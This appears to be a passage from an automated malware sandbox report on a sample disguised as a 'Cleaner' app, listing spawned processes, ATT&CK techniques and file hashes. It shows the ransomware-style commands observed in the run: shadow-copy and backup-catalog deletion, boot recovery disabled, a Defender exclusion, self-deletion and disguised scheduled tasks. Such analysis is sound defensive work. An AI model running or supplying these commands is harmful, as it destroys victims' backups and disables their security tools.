C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1548 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2584 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2544 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --mojo-platform-channel-handle=2288 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --mojo-platform-channel-handle=3100 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3136 /prefetch:25⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --mojo-platform-channel-handle=3520 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --mojo-platform-channel-handle=2116 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --mojo-platform-channel-handle=2064 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,13677576957955796234,16691276282722521056,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7964_1392991135" --mojo-platform-channel-handle=3444 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_36D9.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1b4f591b-cc02-034f-96ed-120dff2d8e4e}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\2B63.exeC:\Users\Admin\AppData\Local\Temp\2B63.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\2F0D.exeC:\Users\Admin\AppData\Local\Temp\2F0D.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\36DE.exeC:\Users\Admin\AppData\Local\Temp\36DE.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\444D.exeC:\Users\Admin\AppData\Local\Temp\444D.exe1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
C:\Users\Admin\AppData\Local\Temp\53BF.exeC:\Users\Admin\AppData\Local\Temp\53BF.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\5F87.exeC:\Users\Admin\AppData\Local\Temp\5F87.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\7B8C.exeC:\Users\Admin\AppData\Local\Temp\7B8C.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\3436f48c-4f40-4457-a9a5-cb4aec1f10dd\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\3436f48c-4f40-4457-a9a5-cb4aec1f10dd\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3436f48c-4f40-4457-a9a5-cb4aec1f10dd\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Users\Admin\AppData\Local\Temp\3436f48c-4f40-4457-a9a5-cb4aec1f10dd\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\3436f48c-4f40-4457-a9a5-cb4aec1f10dd\AdvancedRun.exe" /SpecialRun 4101d8 58043⤵
-
C:\Users\Admin\AppData\Local\Temp\7B8C.exeC:\Users\Admin\AppData\Local\Temp\7B8C.exe2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7B8C.exe" -Force2⤵
-
C:\Users\Admin\AppData\Local\Temp\859F.exeC:\Users\Admin\AppData\Local\Temp\859F.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\8850.exeC:\Users\Admin\AppData\Local\Temp\8850.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 8850.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8850.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 8850.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\8D43.exeC:\Users\Admin\AppData\Local\Temp\8D43.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 03⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\912C.exeC:\Users\Admin\AppData\Local\Temp\912C.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\96F9.exeC:\Users\Admin\AppData\Local\Temp\96F9.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E3AqPB7u6E.bat"2⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵
-
C:\Windows\System32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵
-
C:\Users\Admin\AppData\Local\Temp\96F9.exe"C:\Users\Admin\AppData\Local\Temp\96F9.exe"3⤵
-
C:\Program Files (x86)\Windows Media Player\Skins\explorer.exe"C:\Program Files (x86)\Windows Media Player\Skins\explorer.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\9B11.exeC:\Users\Admin\AppData\Local\Temp\9B11.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\9D35.exeC:\Users\Admin\AppData\Local\Temp\9D35.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\DC33.exeC:\Users\Admin\AppData\Local\Temp\DC33.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\DC33.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\URf2FSGuPc.exe"C:\Users\Admin\AppData\Local\Temp\URf2FSGuPc.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\URf2FSGuPc.exeC:\Users\Admin\AppData\Local\Temp\URf2FSGuPc.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\URf2FSGuPc.exeC:\Users\Admin\AppData\Local\Temp\URf2FSGuPc.exe3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\AITNGSZKWN\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\odt\msiexec.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\adprovider\WerFault.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Roaming\brtwjasC:\Users\Admin\AppData\Roaming\brtwjas1⤵
-
C:\Users\Admin\AppData\Roaming\catwjasC:\Users\Admin\AppData\Roaming\catwjas1⤵
-
C:\Users\Admin\AppData\Roaming\catwjasC:\Users\Admin\AppData\Roaming\catwjas2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4141⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "mBmgCtfIlDKzUJ7YxAHLKFQ3" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Setup\mBmgCtfIlDKzUJ7YxAHLKFQ3.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Config.Msi\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "5281144" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\5281144.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Skins\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\brtwjasC:\Users\Admin\AppData\Roaming\brtwjas1⤵
-
C:\Users\Admin\AppData\Roaming\catwjasC:\Users\Admin\AppData\Roaming\catwjas1⤵
-
C:\Users\Admin\AppData\Roaming\catwjasC:\Users\Admin\AppData\Roaming\catwjas2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\NPSMDesktopProvider\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\wmdmlog\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
Modify Registry
2Disabling Security Tools
1File Deletion
2Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
9499dac59e041d057327078ccada8329
SHA1707088977b09835d2407f91f4f6dbe4a4c8f2fff
SHA256ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9
SHA5129d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
9499dac59e041d057327078ccada8329
SHA1707088977b09835d2407f91f4f6dbe4a4c8f2fff
SHA256ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9
SHA5129d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
